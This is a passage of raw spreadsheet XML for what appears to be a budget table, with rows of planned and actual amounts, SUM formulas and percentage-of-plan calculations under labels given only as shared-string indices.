        <v>0</v>
      </c>
      <c r="E1206" s="173"/>
      <c r="F1206" s="174"/>
      <c r="G1206" s="172"/>
    </row>
    <row r="1207" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1207" s="128" t="s">
        <v>1301</v>
      </c>
      <c r="B1207" s="100">
        <f>SUM(B1208,B1220,B1226,B1232,B1240,B1253,B1257,B1263)</f>
        <v>2839</v>
      </c>
      <c r="C1207" s="100">
        <f>SUM(C1208,C1220,C1226,C1232,C1240,C1253,C1257,C1263)</f>
        <v>2839</v>
      </c>
      <c r="D1207" s="100">
        <f>SUM(D1208,D1220,D1226,D1232,D1240,D1253,D1257,D1263)</f>
        <v>3017</v>
      </c>
      <c r="E1207" s="173">
        <f>SUM(E1208,E1220,E1226,E1232,E1240,E1253,E1257,E1263)</f>
        <v>3017</v>
      </c>
      <c r="F1207" s="174">
        <f aca="true" t="shared" si="66" ref="F1207:F1209">E1207/C1207*100</f>
        <v>106.26981331454736</v>
      </c>
      <c r="G1207" s="172"/>
    </row>
    <row r="1208" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1208" s="128" t="s">
        <v>1302</v>
      </c>
      <c r="B1208" s="100">
        <f>SUM(B1209:B1219)</f>
        <v>2146</v>
      </c>
      <c r="C1208" s="100">
        <f>SUM(C1209:C1219)</f>
        <v>2146</v>
      </c>
      <c r="D1208" s="100">
        <f>SUM(D1209:D1219)</f>
        <v>2326</v>
      </c>
      <c r="E1208" s="173">
        <f>SUM(E1209:E1219)</f>
        <v>2326</v>
      </c>
      <c r="F1208" s="174">
        <f t="shared" si="66"/>
        <v>108.38769804287045</v>
      </c>
      <c r="G1208" s="172"/>
    </row>
    <row r="1209" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1209" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1209" s="100">
        <v>587</v>
      </c>
      <c r="C1209" s="100">
        <v>587</v>
      </c>
      <c r="D1209" s="100">
        <v>554</v>
      </c>
      <c r="E1209" s="173">
        <v>554</v>
      </c>
      <c r="F1209" s="174">
        <f t="shared" si="66"/>
        <v>94.37819420783646</v>
      </c>
      <c r="G1209" s="172"/>
    </row>
    <row r="1210" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1210" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1210" s="100">
        <v>0</v>
      </c>
      <c r="C1210" s="100"/>
      <c r="D1210" s="100">
        <v>0</v>
      </c>
      <c r="E1210" s="173"/>
      <c r="F1210" s="174"/>
      <c r="G1210" s="172"/>
    </row>
    <row r="1211" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1211" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1211" s="100">
        <v>0</v>
      </c>
      <c r="C1211" s="100"/>
      <c r="D1211" s="100">
        <v>0</v>
      </c>
      <c r="E1211" s="173"/>
      <c r="F1211" s="174"/>
      <c r="G1211" s="172"/>
    </row>
    <row r="1212" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1212" s="128" t="s">
        <v>1303</v>
      </c>
      <c r="B1212" s="100">
        <v>50</v>
      </c>
      <c r="C1212" s="100">
        <v>50</v>
      </c>
      <c r="D1212" s="100">
        <v>30</v>
      </c>
      <c r="E1212" s="173">
        <v>30</v>
      </c>
      <c r="F1212" s="174">
        <f>E1212/C1212*100</f>
        <v>60</v>
      </c>
      <c r="G1212" s="172"/>
    </row>
    <row r="1213" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1213" s="128" t="s">
        <v>1304</v>
      </c>
      <c r="B1213" s="100">
        <v>0</v>
      </c>
      <c r="C1213" s="100"/>
      <c r="D1213" s="100">
        <v>0</v>
      </c>
      <c r="E1213" s="173"/>
      <c r="F1213" s="174"/>
      <c r="G1213" s="172"/>
    </row>
    <row r="1214" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1214" s="128" t="s">
        <v>1305</v>
      </c>
      <c r="B1214" s="100">
        <v>0</v>
      </c>
      <c r="C1214" s="100"/>
      <c r="D1214" s="100">
        <v>180</v>
      </c>
      <c r="E1214" s="173">
        <v>180</v>
      </c>
      <c r="F1214" s="174"/>
      <c r="G1214" s="172"/>
    </row>
    <row r="1215" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1215" s="128" t="s">
        <v>1306</v>
      </c>
      <c r="B1215" s="100">
        <v>0</v>
      </c>
      <c r="C1215" s="100"/>
      <c r="D1215" s="100">
        <v>0</v>
      </c>
      <c r="E1215" s="173"/>
      <c r="F1215" s="174"/>
      <c r="G1215" s="172"/>
    </row>
    <row r="1216" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1216" s="128" t="s">
        <v>1307</v>
      </c>
      <c r="B1216" s="100">
        <v>752</v>
      </c>
      <c r="C1216" s="100">
        <v>752</v>
      </c>
      <c r="D1216" s="100">
        <v>900</v>
      </c>
      <c r="E1216" s="173">
        <v>900</v>
      </c>
      <c r="F1216" s="174">
        <f aca="true" t="shared" si="67" ref="F1216:F1219">E1216/C1216*100</f>
        <v>119.68085106382979</v>
      </c>
      <c r="G1216" s="172"/>
    </row>
    <row r="1217" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1217" s="128" t="s">
        <v>1308</v>
      </c>
      <c r="B1217" s="100">
        <v>0</v>
      </c>
      <c r="C1217" s="100"/>
      <c r="D1217" s="100">
        <v>0</v>
      </c>
      <c r="E1217" s="173"/>
      <c r="F1217" s="174"/>
      <c r="G1217" s="172"/>
    </row>
    <row r="1218" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1218" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B1218" s="100">
        <v>257</v>
      </c>
      <c r="C1218" s="100">
        <v>257</v>
      </c>
      <c r="D1218" s="100">
        <v>257</v>
      </c>
      <c r="E1218" s="173">
        <v>257</v>
      </c>
      <c r="F1218" s="174">
        <f t="shared" si="67"/>
        <v>100</v>
      </c>
      <c r="G1218" s="172"/>
    </row>
    <row r="1219" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1219" s="128" t="s">
        <v>1309</v>
      </c>
      <c r="B1219" s="100">
        <f>1000-500</f>
        <v>500</v>
      </c>
      <c r="C1219" s="100">
        <f>1000-500</f>
        <v>500</v>
      </c>
      <c r="D1219" s="100">
        <v>405</v>
      </c>
      <c r="E1219" s="173">
        <v>405</v>
      </c>
      <c r="F1219" s="174">
        <f t="shared" si="67"/>
        <v>81</v>
      </c>
      <c r="G1219" s="172"/>
    </row>
    <row r="1220" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1220" s="128" t="s">
        <v>1310</v>
      </c>
      <c r="B1220" s="100">
        <f>SUM(B1221:B1225)</f>
        <v>0</v>
      </c>
      <c r="C1220" s="100">
        <f>SUM(C1221:C1225)</f>
        <v>0</v>
      </c>
      <c r="D1220" s="100">
        <f>SUM(D1221:D1225)</f>
        <v>0</v>
      </c>
      <c r="E1220" s="173">
        <f>SUM(E1221:E1225)</f>
        <v>0</v>
      </c>
      <c r="F1220" s="174"/>
      <c r="G1220" s="172"/>
    </row>
    <row r="1221" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1221" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1221" s="100"/>
      <c r="C1221" s="100"/>
      <c r="D1221" s="100">
        <v>0</v>
      </c>
      <c r="E1221" s="173"/>
      <c r="F1221" s="174"/>
      <c r="G1221" s="172"/>
    </row>
    <row r="1222" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1222" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1222" s="100"/>
      <c r="C1222" s="100"/>
      <c r="D1222" s="100">
        <v>0</v>
      </c>
      <c r="E1222" s="173"/>
      <c r="F1222" s="174"/>
      <c r="G1222" s="172"/>
    </row>
    <row r="1223" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1223" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1223" s="100"/>
      <c r="C1223" s="100"/>
      <c r="D1223" s="100">
        <v>0</v>
      </c>
      <c r="E1223" s="173"/>
      <c r="F1223" s="174"/>
      <c r="G1223" s="172"/>
    </row>
    <row r="1224" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1224" s="128" t="s">
        <v>1311</v>
      </c>
      <c r="B1224" s="100"/>
      <c r="C1224" s="100"/>
      <c r="D1224" s="100">
        <v>0</v>
      </c>
      <c r="E1224" s="173"/>
      <c r="F1224" s="174"/>
      <c r="G1224" s="172"/>
    </row>
    <row r="1225" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1225" s="128" t="s">
        <v>1312</v>
      </c>
      <c r="B1225" s="100"/>
      <c r="C1225" s="100"/>
      <c r="D1225" s="100">
        <v>0</v>
      </c>
      <c r="E1225" s="173"/>
      <c r="F1225" s="174"/>
      <c r="G1225" s="172"/>
    </row>
    <row r="1226" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1226" s="128" t="s">
        <v>1313</v>
      </c>
      <c r="B1226" s="100">
        <f>SUM(B1227:B1231)</f>
        <v>313</v>
      </c>
      <c r="C1226" s="100">
        <f>SUM(C1227:C1231)</f>
        <v>313</v>
      </c>
      <c r="D1226" s="100">
        <f>SUM(D1227:D1231)</f>
        <v>350</v>
      </c>
      <c r="E1226" s="173">
        <f>SUM(E1227:E1231)</f>
        <v>350</v>
      </c>
      <c r="F1226" s="174">
        <f>E1226/C1226*100</f>
        <v>111.82108626198084</v>
      </c>
      <c r="G1226" s="172"/>
    </row>
    <row r="1227" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1227" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1227" s="100">
        <v>0</v>
      </c>
      <c r="C1227" s="100"/>
      <c r="D1227" s="100">
        <v>0</v>
      </c>
      <c r="E1227" s="173"/>
      <c r="F1227" s="174"/>
      <c r="G1227" s="172"/>
    </row>
    <row r="1228" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1228" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1228" s="100">
        <v>0</v>
      </c>
      <c r="C1228" s="100"/>
      <c r="D1228" s="100">
        <v>0</v>
      </c>
      <c r="E1228" s="173"/>
      <c r="F1228" s="174"/>
      <c r="G1228" s="172"/>
    </row>
    <row r="1229" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1229" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1229" s="100">
        <v>0</v>
      </c>
      <c r="C1229" s="100"/>
      <c r="D1229" s="100">
        <v>0</v>
      </c>
      <c r="E1229" s="173"/>
      <c r="F1229" s="174"/>
      <c r="G1229" s="172"/>
    </row>
    <row r="1230" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1230" s="128" t="s">
        <v>1314</v>
      </c>
      <c r="B1230" s="100">
        <v>0</v>
      </c>
      <c r="C1230" s="100"/>
      <c r="D1230" s="100">
        <f>100+250</f>
        <v>350</v>
      </c>
      <c r="E1230" s="173">
        <f>100+250</f>
        <v>350</v>
      </c>
      <c r="F1230" s="174"/>
      <c r="G1230" s="172"/>
    </row>
    <row r="1231" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1231" s="128" t="s">
        <v>1315</v>
      </c>
      <c r="B1231" s="100">
        <v>313</v>
      </c>
      <c r="C1231" s="100">
        <v>313</v>
      </c>
      <c r="D1231" s="100">
        <v>0</v>
      </c>
      <c r="E1231" s="173"/>
      <c r="F1231" s="174">
        <f>E1231/C1231*100</f>
        <v>0</v>
      </c>
      <c r="G1231" s="172"/>
    </row>
    <row r="1232" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1232" s="128" t="s">
        <v>1316</v>
      </c>
      <c r="B1232" s="100">
        <f>SUM(B1233:B1239)</f>
        <v>0</v>
      </c>
      <c r="C1232" s="100">
        <f>SUM(C1233:C1239)</f>
        <v>0</v>
      </c>
      <c r="D1232" s="100">
        <f>SUM(D1233:D1239)</f>
        <v>0</v>
      </c>
      <c r="E1232" s="173">
        <f>SUM(E1233:E1239)</f>
        <v>0</v>
      </c>
      <c r="F1232" s="174"/>
      <c r="G1232" s="172"/>
    </row>
    <row r="1233" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1233" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1233" s="100"/>
      <c r="C1233" s="100"/>
      <c r="D1233" s="100">
        <v>0</v>
      </c>
      <c r="E1233" s="173"/>
      <c r="F1233" s="174"/>
      <c r="G1233" s="172"/>
    </row>
    <row r="1234" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1234" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1234" s="100"/>
      <c r="C1234" s="100"/>
      <c r="D1234" s="100">
        <v>0</v>
      </c>
      <c r="E1234" s="173"/>
      <c r="F1234" s="174"/>
      <c r="G1234" s="172"/>
    </row>
    <row r="1235" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1235" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1235" s="100"/>
      <c r="C1235" s="100"/>
      <c r="D1235" s="100">
        <v>0</v>
      </c>
      <c r="E1235" s="173"/>
      <c r="F1235" s="174"/>
      <c r="G1235" s="172"/>
    </row>
    <row r="1236" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1236" s="128" t="s">
        <v>1317</v>
      </c>
      <c r="B1236" s="100"/>
      <c r="C1236" s="100"/>
      <c r="D1236" s="100">
        <v>0</v>
      </c>
      <c r="E1236" s="173"/>
      <c r="F1236" s="174"/>
      <c r="G1236" s="172"/>
    </row>
    <row r="1237" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1237" s="128" t="s">
        <v>1318</v>
      </c>
      <c r="B1237" s="100"/>
      <c r="C1237" s="100"/>
      <c r="D1237" s="100">
        <v>0</v>
      </c>
      <c r="E1237" s="173"/>
      <c r="F1237" s="174"/>
      <c r="G1237" s="172"/>
    </row>
    <row r="1238" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1238" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B1238" s="100"/>
      <c r="C1238" s="100"/>
      <c r="D1238" s="100">
        <v>0</v>
      </c>
      <c r="E1238" s="173"/>
      <c r="F1238" s="174"/>
      <c r="G1238" s="172"/>
    </row>
    <row r="1239" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1239" s="128" t="s">
        <v>1319</v>
      </c>
      <c r="B1239" s="100"/>
      <c r="C1239" s="100"/>
      <c r="D1239" s="100">
        <v>0</v>
      </c>
      <c r="E1239" s="173"/>
      <c r="F1239" s="174"/>
      <c r="G1239" s="172"/>
    </row>
    <row r="1240" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1240" s="128" t="s">
        <v>1320</v>
      </c>
      <c r="B1240" s="100">
        <f>SUM(B1241:B1252)</f>
        <v>360</v>
      </c>
      <c r="C1240" s="100">
        <f>SUM(C1241:C1252)</f>
        <v>360</v>
      </c>
      <c r="D1240" s="100">
        <f>SUM(D1241:D1252)</f>
        <v>341</v>
      </c>
      <c r="E1240" s="173">
        <f>SUM(E1241:E1252)</f>
        <v>341</v>
      </c>
      <c r="F1240" s="174">
        <f>E1240/C1240*100</f>
        <v>94.72222222222221</v>
      </c>
      <c r="G1240" s="172"/>
    </row>
    <row r="1241" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1241" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1241" s="100">
        <v>220</v>
      </c>
      <c r="C1241" s="100">
        <v>220</v>
      </c>
      <c r="D1241" s="100">
        <v>231</v>
      </c>
      <c r="E1241" s="173">
        <v>231</v>
      </c>
      <c r="F1241" s="174">
        <f>E1241/C1241*100</f>
        <v>105</v>
      </c>
      <c r="G1241" s="172"/>
    </row>
    <row r="1242" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1242" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1242" s="100">
        <v>0</v>
      </c>
      <c r="C1242" s="100"/>
      <c r="D1242" s="100">
        <v>0</v>
      </c>
      <c r="E1242" s="173"/>
      <c r="F1242" s="174"/>
      <c r="G1242" s="172"/>
    </row>
    <row r="1243" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1243" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1243" s="100">
        <v>0</v>
      </c>
      <c r="C1243" s="100"/>
      <c r="D1243" s="100">
        <v>0</v>
      </c>
      <c r="E1243" s="173"/>
      <c r="F1243" s="174"/>
      <c r="G1243" s="172"/>
    </row>
    <row r="1244" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1244" s="128" t="s">
        <v>1321</v>
      </c>
      <c r="B1244" s="100">
        <v>0</v>
      </c>
      <c r="C1244" s="100"/>
      <c r="D1244" s="100">
        <v>0</v>
      </c>
      <c r="E1244" s="173"/>
      <c r="F1244" s="174"/>
      <c r="G1244" s="172"/>
    </row>
    <row r="1245" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1245" s="128" t="s">
        <v>1322</v>
      </c>
      <c r="B1245" s="100">
        <v>0</v>
      </c>
      <c r="C1245" s="100"/>
      <c r="D1245" s="100">
        <v>0</v>
      </c>
      <c r="E1245" s="173"/>
      <c r="F1245" s="174"/>
      <c r="G1245" s="172"/>
    </row>
    <row r="1246" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1246" s="128" t="s">
        <v>1323</v>
      </c>
      <c r="B1246" s="100">
        <v>140</v>
      </c>
      <c r="C1246" s="100">
        <v>140</v>
      </c>
      <c r="D1246" s="100">
        <v>0</v>
      </c>
      <c r="E1246" s="173"/>
      <c r="F1246" s="174">
        <f>E1246/C1246*100</f>
        <v>0</v>
      </c>
      <c r="G1246" s="172"/>
    </row>
    <row r="1247" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1247" s="128" t="s">
        <v>1324</v>
      </c>
      <c r="B1247" s="100">
        <v>0</v>
      </c>
      <c r="C1247" s="100"/>
      <c r="D1247" s="100">
        <v>0</v>
      </c>
      <c r="E1247" s="173"/>
      <c r="F1247" s="174"/>
      <c r="G1247" s="172"/>
    </row>
    <row r="1248" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1248" s="128" t="s">
        <v>1325</v>
      </c>
      <c r="B1248" s="100">
        <v>0</v>
      </c>
      <c r="C1248" s="100"/>
      <c r="D1248" s="100">
        <v>0</v>
      </c>
      <c r="E1248" s="173"/>
      <c r="F1248" s="174"/>
      <c r="G1248" s="172"/>
    </row>
    <row r="1249" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1249" s="128" t="s">
        <v>1326</v>
      </c>
      <c r="B1249" s="100">
        <v>0</v>
      </c>
      <c r="C1249" s="100"/>
      <c r="D1249" s="100">
        <v>0</v>
      </c>
      <c r="E1249" s="173"/>
      <c r="F1249" s="174"/>
      <c r="G1249" s="172"/>
    </row>
    <row r="1250" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1250" s="128" t="s">
        <v>1327</v>
      </c>
      <c r="B1250" s="100">
        <v>0</v>
      </c>
      <c r="C1250" s="100"/>
      <c r="D1250" s="100">
        <v>0</v>
      </c>
      <c r="E1250" s="173"/>
      <c r="F1250" s="174"/>
      <c r="G1250" s="172"/>
    </row>
    <row r="1251" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1251" s="128" t="s">
        <v>1328</v>
      </c>
      <c r="B1251" s="100">
        <v>0</v>
      </c>
      <c r="C1251" s="100"/>
      <c r="D1251" s="100">
        <v>0</v>
      </c>
      <c r="E1251" s="173"/>
      <c r="F1251" s="174"/>
      <c r="G1251" s="172"/>
    </row>
    <row r="1252" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1252" s="128" t="s">
        <v>1329</v>
      </c>
      <c r="B1252" s="100">
        <v>0</v>
      </c>
      <c r="C1252" s="100"/>
      <c r="D1252" s="100">
        <v>110</v>
      </c>
      <c r="E1252" s="173">
        <v>110</v>
      </c>
      <c r="F1252" s="174"/>
      <c r="G1252" s="172"/>
    </row>
    <row r="1253" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1253" s="128" t="s">
        <v>1330</v>
      </c>
      <c r="B1253" s="100">
        <f>SUM(B1254:B1256)</f>
        <v>0</v>
      </c>
      <c r="C1253" s="100">
        <f>SUM(C1254:C1256)</f>
        <v>0</v>
      </c>
      <c r="D1253" s="100">
        <f>SUM(D1254:D1256)</f>
        <v>0</v>
      </c>
      <c r="E1253" s="173">
        <f>SUM(E1254:E1256)</f>
        <v>0</v>
      </c>
      <c r="F1253" s="174"/>
      <c r="G1253" s="172"/>
    </row>
    <row r="1254" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1254" s="128" t="s">
        <v>1331</v>
      </c>
      <c r="B1254" s="100"/>
      <c r="C1254" s="100"/>
      <c r="D1254" s="100">
        <v>0</v>
      </c>
      <c r="E1254" s="173"/>
      <c r="F1254" s="174"/>
      <c r="G1254" s="172"/>
    </row>
    <row r="1255" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1255" s="128" t="s">
        <v>1332</v>
      </c>
      <c r="B1255" s="100">
        <v>0</v>
      </c>
      <c r="C1255" s="100"/>
      <c r="D1255" s="100">
        <v>0</v>
      </c>
      <c r="E1255" s="173"/>
      <c r="F1255" s="174"/>
      <c r="G1255" s="172"/>
    </row>
    <row r="1256" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1256" s="128" t="s">
        <v>1333</v>
      </c>
      <c r="B1256" s="100">
        <v>0</v>
      </c>
      <c r="C1256" s="100"/>
      <c r="D1256" s="100">
        <v>0</v>
      </c>
      <c r="E1256" s="173"/>
      <c r="F1256" s="174"/>
      <c r="G1256" s="172"/>
    </row>
    <row r="1257" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1257" s="128" t="s">
        <v>1334</v>
      </c>
      <c r="B1257" s="100">
        <f>SUM(B1258:B1262)</f>
        <v>20</v>
      </c>
      <c r="C1257" s="100">
        <f>SUM(C1258:C1262)</f>
        <v>20</v>
      </c>
      <c r="D1257" s="100">
        <f>SUM(D1258:D1262)</f>
        <v>0</v>
      </c>
      <c r="E1257" s="173">
        <f>SUM(E1258:E1262)</f>
        <v>0</v>
      </c>
      <c r="F1257" s="174">
        <f>E1257/C1257*100</f>
        <v>0</v>
      </c>
      <c r="G1257" s="172"/>
    </row>
    <row r="1258" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1258" s="128" t="s">
        <v>1335</v>
      </c>
      <c r="B1258" s="100">
        <v>0</v>
      </c>
      <c r="C1258" s="100"/>
      <c r="D1258" s="100">
        <v>0</v>
      </c>
      <c r="E1258" s="173"/>
      <c r="F1258" s="174"/>
      <c r="G1258" s="172"/>
    </row>
    <row r="1259" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1259" s="128" t="s">
        <v>1336</v>
      </c>
      <c r="B1259" s="100">
        <v>20</v>
      </c>
      <c r="C1259" s="100">
        <v>20</v>
      </c>
      <c r="D1259" s="100">
        <v>0</v>
      </c>
      <c r="E1259" s="173"/>
      <c r="F1259" s="174">
        <f>E1259/C1259*100</f>
        <v>0</v>
      </c>
      <c r="G1259" s="172"/>
    </row>
    <row r="1260" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1260" s="128" t="s">
        <v>1337</v>
      </c>
      <c r="B1260" s="100">
        <v>0</v>
      </c>
      <c r="C1260" s="100"/>
      <c r="D1260" s="100">
        <v>0</v>
      </c>
      <c r="E1260" s="173"/>
      <c r="F1260" s="174"/>
      <c r="G1260" s="172"/>
    </row>
    <row r="1261" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1261" s="128" t="s">
        <v>1338</v>
      </c>
      <c r="B1261" s="100">
        <v>0</v>
      </c>
      <c r="C1261" s="100"/>
      <c r="D1261" s="100">
        <v>0</v>
      </c>
      <c r="E1261" s="173"/>
      <c r="F1261" s="174"/>
      <c r="G1261" s="172"/>
    </row>
    <row r="1262" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1262" s="128" t="s">
        <v>1339</v>
      </c>
      <c r="B1262" s="100">
        <v>0</v>
      </c>
      <c r="C1262" s="100"/>
      <c r="D1262" s="100">
        <v>0</v>
      </c>
      <c r="E1262" s="173"/>
      <c r="F1262" s="174"/>
      <c r="G1262" s="172"/>
    </row>
    <row r="1263" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1263" s="128" t="s">
        <v>1340</v>
      </c>
      <c r="B1263" s="100"/>
      <c r="C1263" s="100"/>
      <c r="D1263" s="100">
        <v>0</v>
      </c>
      <c r="E1263" s="173"/>
      <c r="F1263" s="174"/>
      <c r="G1263" s="172"/>
    </row>
    <row r="1264" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1264" s="128" t="s">
        <v>1341</v>
      </c>
      <c r="B1264" s="100">
        <v>3500</v>
      </c>
      <c r="C1264" s="100">
        <v>3500</v>
      </c>
      <c r="D1264" s="100">
        <f>7500+500</f>
        <v>8000</v>
      </c>
      <c r="E1264" s="173">
        <f>7500+500</f>
        <v>8000</v>
      </c>
      <c r="F1264" s="174">
        <f aca="true" t="shared" si="68" ref="F1264:F1267">E1264/C1264*100</f>
        <v>228.57142857142856</v>
      </c>
      <c r="G1264" s="172"/>
    </row>
    <row r="1265" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1265" s="128" t="s">
        <v>1342</v>
      </c>
      <c r="B1265" s="100">
        <f>B1266</f>
        <v>13857</v>
      </c>
      <c r="C1265" s="100">
        <f>C1266</f>
        <v>13857</v>
      </c>
      <c r="D1265" s="100">
        <f>D1266</f>
        <v>17594</v>
      </c>
      <c r="E1265" s="173">
        <f>E1266</f>
        <v>17594</v>
      </c>
      <c r="F1265" s="174">
        <f t="shared" si="68"/>
        <v>126.9683192610233</v>
      </c>
      <c r="G1265" s="172"/>
    </row>
    <row r="1266" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1266" s="128" t="s">
        <v>1343</v>
      </c>
      <c r="B1266" s="100">
        <f>SUM(B1267:B1270)</f>
        <v>13857</v>
      </c>
      <c r="C1266" s="100">
        <f>SUM(C1267:C1270)</f>
        <v>13857</v>
      </c>
      <c r="D1266" s="100">
        <v>17594</v>
      </c>
      <c r="E1266" s="173">
        <f>SUM(E1267:E1270)</f>
        <v>17594</v>
      </c>
      <c r="F1266" s="174">
        <f t="shared" si="68"/>
        <v>126.9683192610233</v>
      </c>
      <c r="G1266" s="172"/>
    </row>
    <row r="1267" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1267" s="128" t="s">
        <v>1344</v>
      </c>
      <c r="B1267" s="100">
        <v>13857</v>
      </c>
      <c r="C1267" s="100">
        <v>13857</v>
      </c>
      <c r="D1267" s="100">
        <v>17594</v>
      </c>
      <c r="E1267" s="173">
        <v>17594</v>
      </c>
      <c r="F1267" s="174">
        <f t="shared" si="68"/>
        <v>126.9683192610233</v>
      </c>
      <c r="G1267" s="172"/>
    </row>
    <row r="1268" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1268" s="128" t="s">
        <v>1345</v>
      </c>
      <c r="B1268" s="100"/>
      <c r="C1268" s="100"/>
      <c r="D1268" s="100">
        <v>0</v>
      </c>
      <c r="E1268" s="173"/>
      <c r="F1268" s="174"/>
      <c r="G1268" s="172"/>
    </row>
    <row r="1269" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1269" s="128" t="s">
        <v>1346</v>
      </c>
      <c r="B1269" s="100"/>
      <c r="C1269" s="100"/>
      <c r="D1269" s="100">
        <v>0</v>
      </c>
      <c r="E1269" s="173"/>
      <c r="F1269" s="174"/>
      <c r="G1269" s="172"/>
    </row>
    <row r="1270" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1270" s="128" t="s">
        <v>1347</v>
      </c>
      <c r="B1270" s="100"/>
      <c r="C1270" s="100"/>
      <c r="D1270" s="100">
        <v>0</v>
      </c>
      <c r="E1270" s="173"/>
      <c r="F1270" s="174"/>
      <c r="G1270" s="172"/>
    </row>
    <row r="1271" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1271" s="128" t="s">
        <v>1348</v>
      </c>
      <c r="B1271" s="100">
        <f>B1272</f>
        <v>0</v>
      </c>
      <c r="C1271" s="100">
        <f>C1272</f>
        <v>0</v>
      </c>
      <c r="D1271" s="100">
        <v>0</v>
      </c>
      <c r="E1271" s="173">
        <f>E1272</f>
        <v>0</v>
      </c>
      <c r="F1271" s="174"/>
      <c r="G1271" s="172"/>
    </row>
    <row r="1272" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1272" s="128" t="s">
        <v>1349</v>
      </c>
      <c r="B1272" s="100"/>
      <c r="C1272" s="100"/>
      <c r="D1272" s="100">
        <v>0</v>
      </c>
      <c r="E1272" s="173"/>
      <c r="F1272" s="174"/>
      <c r="G1272" s="172"/>
    </row>
    <row r="1273" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1273" s="128" t="s">
        <v>1350</v>
      </c>
      <c r="B1273" s="100">
        <f>SUM(B1274:B1275)</f>
        <v>139276</v>
      </c>
      <c r="C1273" s="100">
        <f>SUM(C1274:C1275)</f>
        <v>38459</v>
      </c>
      <c r="D1273" s="100">
        <f>SUM(D1274:D1275)</f>
        <v>95705</v>
      </c>
      <c r="E1273" s="173">
        <f>SUM(E1274:E1275)</f>
        <v>40964</v>
      </c>
      <c r="F1273" s="174">
        <f>E1273/C1273*100</f>
        <v>106.51342988637249</v>
      </c>
      <c r="G1273" s="172"/>
    </row>
    <row r="1274" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1274" s="128" t="s">
        <v>1351</v>
      </c>
      <c r="B1274" s="100"/>
      <c r="C1274" s="100"/>
